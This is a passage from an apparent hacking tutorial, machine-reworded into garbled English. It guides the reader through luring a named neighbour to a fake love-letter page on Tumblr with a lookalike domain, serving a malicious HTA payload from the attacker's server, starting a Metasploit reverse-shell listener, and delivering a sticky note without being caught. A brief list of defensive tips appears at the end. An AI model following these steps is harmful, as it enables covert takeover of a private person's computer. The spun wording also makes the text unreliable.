today of which we have our payload hosted on our VPS, as well as Metasploit installed, we can begin developing the webpage which will trick our “John Smith” target into opening our malicious file. Once he has, we can take over his computer.
This kind of part will be more involved, nevertheless the first task will be to create a website which has a page of which John will see. Crafting a convincing social engineering page will be vital to the success of the attack, as well as also we know our target well, so the idea shouldn’t be too hard.
Next, we’ll embed the payload we created as well as also hosted on our VPS inside previous guide. We’ll make the payload a downloadable “video” file on the social engineering page. nevertheless This kind of won’t work at all without a convincing website name, so registering a domain name will be next. We’ll register a website named after our victim (“john-smith.com) as well as also forward those requests to our social engineering page.
For the final act, we’ll learn when as well as also how to strategically deliver the Post-the idea note to our victim, get a reverse shell on his computer, as well as also beginning working our magic with Metasploit to own everything on his system. nevertheless This kind of lesson wouldn’t be complete unless we also talked about ways of which you could prevent yourself via falling victim to such an elaborate attack, so let’s get to the idea!
Step 1: Create a Website
the idea’s time today to create the webpage our victim, John Smith, will see when he visits our website. There are numerous ways we can create websites for free. Below are just a few available options.
All of these websites are suitable choices. If you have experience with any of them or similar sites, feel free to use whichever website you’re most comfortable with. Tumblr will be one of the most well-liked websites inside planet, so there’s a Great chance readers have used their services inside past to create websites. the idea’s also very easy as well as also intuitive to use. For of which reason, I’ll be demonstrating how to create a simple website using Tumblr.
To start using Tumblr, head over to their registration page to create an account. Signing up will be free as well as also only requires an email address. Be sure to check your email as well as also click the email verification link Tumblr sends you; Verifying your email will be required to start creating a website.
When of which’s done, click on the “Account” button inside top-right corner, then click on the “Settings” button inside drop-down menu.
inside column on the right side, click on the “Untitled” blog to view the blog settings. If there will be no “Untitled” blog, simply click on the “Create a fresh blog” button to create one. via there, click on the “Edit theme” button to customize the look of our website. inside top-left corner, you’ll find the “Edit HTML” button.
The appearance of This kind of website should be extremely personalized to the person you’re targeting. As a generic example with This kind of tutorial, I’ll recreate This kind of random love letter I found online. John Smith will read This kind of letter as well as also believe the person who left the sticky note on his apartment door will be confessing their secret love for him. I’ll also sign the love letter as a coworker or friend I was able to identify by viewing John’s social media feeds. John’s best friend will be named “Susan Headley.”
I spent a lousy 10 minutes editing the HTML here. In a real scenario, the idea could be beneficial to spend more time crafting This kind of page in a way of which invokes some positive emotion in your victim. We generally don’t want to scare or alarm the person we’re targeting. Putting someone in a cautious or fearful mindset will only make them suspicious of any files we ask them to download as well as also open. This kind of webpage has to be believable enough for our victim to continue reading as well as also ultimately make the idea to the end of the letter.
Clicking the “video of me” link will produce the video-of-me.hta payload we created inside previous article in This kind of series. How you actually name the file will be up to you.
Let’s today take a look at how we link to our HTA payload on the VPS as well as also make the idea accessible to our victim.
We need to ensure our HTA payload can be easily downloaded by our victim via our social engineering webpage. Below will be some simple HTML we’ll use to create a link to resources on additional servers.
Using the below HTML, we can create a download link to the HTA payload file being hosted by the Python3 server we set up inside previous guide.
<a href=”http://Your-Server-IP-Address/video-of-me.hta”>convincing text here</a>
of which’s the idea. Be sure to click “Update Preview” as well as also “Save” inside Tumblr HTML editor.
Step 3: Get a Custom Domain Name (Optional)
the idea may be possible to use the default Tumblr URL as well as also still have success with tricking our victim into visiting “john-smith.tumblr.com.” However, using a Tumblr URL might arouse suspicion in our target as well as also cause our attack to fail. the idea could be inside best interest of the attack to use a fully unique domain name.
There are many services online which we can use to register custom domains. With Dot.tk, we can create custom domain names for free. Dot.tk only requires an email address to use.
To begin registering a domain name with Dot.tk, simply type your desired domain name into the “Check Availability” bar.
We’ll be presented with several domains of which are completely free, including .tk, .ml, as well as also .ga, which might be unusual to some. If you wish to register a .com or a .net, scroll down a bit to view the available premium domains. Paid domains on Dot.tk start at around $4.
When you’ve decided on a domain, click the “Get the idea today!” button on the right side of the domain you wish to register. Then, click on the “Checkout” button of which appears inside top-right corner.
via there, you’ll be redirected to their signup page where you’ll need to enter a valid email address. Dot.tk will send you a verification email with an activation link. Click on the activation link to register your email address. Next, you’ll be redirected to the domain name checkout page. Click the “Forward This kind of domain” button, as well as also enter the URL of the Tumblr page we created in Step 1.
Click on the “Continue” button after entering your Tumblr URL to complete the domain name registration process. of which’s the idea! After a few minutes, visiting “john-smith.tk” in any browser will redirect to the social engineering page we set up earlier.
With your website ready to go, the idea’s time to start Metasploit. SSH into your VPS as well as also use the below command with the -r argument as well as also the “unicorn.rc” file we created inside previous guide. This kind of will automate the Metasploit msfconsole configuration.
msfconsole -r /path/to/unicorn.rc
Step 4: Deliver the Post-the idea Note
Finally, the idea’s time to talk about strategically delivering the Post-the idea note to our intended victim. The goal will be to place the sticky note where your target will be most likely to see the idea. Depending on your building, This kind of may be as simple as stepping out of your apartment in pajamas as well as also placing the idea at eye-level on your neighbor’s apartment door.
If you live in a rural area as well as also can easily be seen approaching your neighbor’s house, you may have to do the idea at an hour when everyone in your neighbor will be likely away at work or asleep. You might also consider using a reliable piece of tape to keep the Post-the idea via being blown off your neighbor’s door by a strong gust of wind. Fortunately, if you get caught approaching your neighbor’s house, Post-the idea notes are modest enough to crumple up in your hand without anyone noticing.
In the first part of This kind of series, I mentioned This kind of kind of social engineering trick can be used to target employees in corporate settings. Post-the idea notes are extremely common as well as also easy to find in office environments. Delivering a Post-the idea note for your intended victim could be as trivial as placing the idea on their computer screen, in their mailbox, or directly on their office phone.
Just be careful to obscure your handwriting when creating the Post-the idea note. If the victim realizes they’re being targeted, an investigation might be opened as well as also the idea could be possible to correlate the handwriting on the sticky note back to you.
Step 5: Post-Exploitation with Msfconsole
When our victim opens the HTA payload on their computer, the reverse TCP connection will establish back on our VPS, allowing for remote access to our victim’s computer. Below will be what a newly established connection looks like using msfconsole.
Our simple HTA payload won’t grant you admin privileges, so you’ll have to work a bit to escalate if you want to make significant alterations to the target device. Users fresh to Metasploit as well as also msfconsole may find our guides on Meterpreter hacking scripts as well as also Meterpreter commands useful.
How to Protect Yourself
There are quite a few unsettling as well as also creepy aspects to This kind of hack. In the first part of This kind of series, we talked about using people search engines as well as also actively monitoring device activity on wireless networks where permission to do so was not explicitly granted to us.
The reality will be of which anyone which has a $30 computer can do most (if not all) of the steps of This kind of hack. Anyone could be gathering public information about you right today as well as also preparing to social engineer you into visiting a website they control. Instead of shying away via articles like This kind of, let’s better understand how these attacks work in order of which we can prepare ourselves should we ever become the intended victim.
- If you have an unnecessary amount of social media accounts, delete as many of them as possible. There’s a Great chance you’re publicly divulging too much about yourself online.
- Don’t over-share personal information when using accounts online. Avoid sharing information about where you live, where you work, as well as also where you are.
- Spoofing hardware MAC addresses when connecting to Wi-Fi networks may help prevent targeted attacks. If your attacker believes you’re using a MacBook as well as also not a Windows computer, any MacBook-specific payloads you’re tricked into opening won’t work in a Windows environment.
- To further conceal outsiders via learning what kinds of devices are used in your home, use Ethernet to access the internet instead of Wi-Fi. Devices connecting to the router via Ethernet cable will not appear in airodump-ng attacks.
- Don’t visit random websites. If you receive a letter, text, email, or any delivery of a strange website as well as also you cannot verify the sender — don’t visit the website.
- Don’t open strange files with unusual file type extensions, especially not via a computer which contains personal or sensitive information.
Until next time, you can find me on the darknet.
Don’t Miss: How to Gain Access to Tokens in Metasploit
Don’t Miss: How to Know if You’ve Been Hacked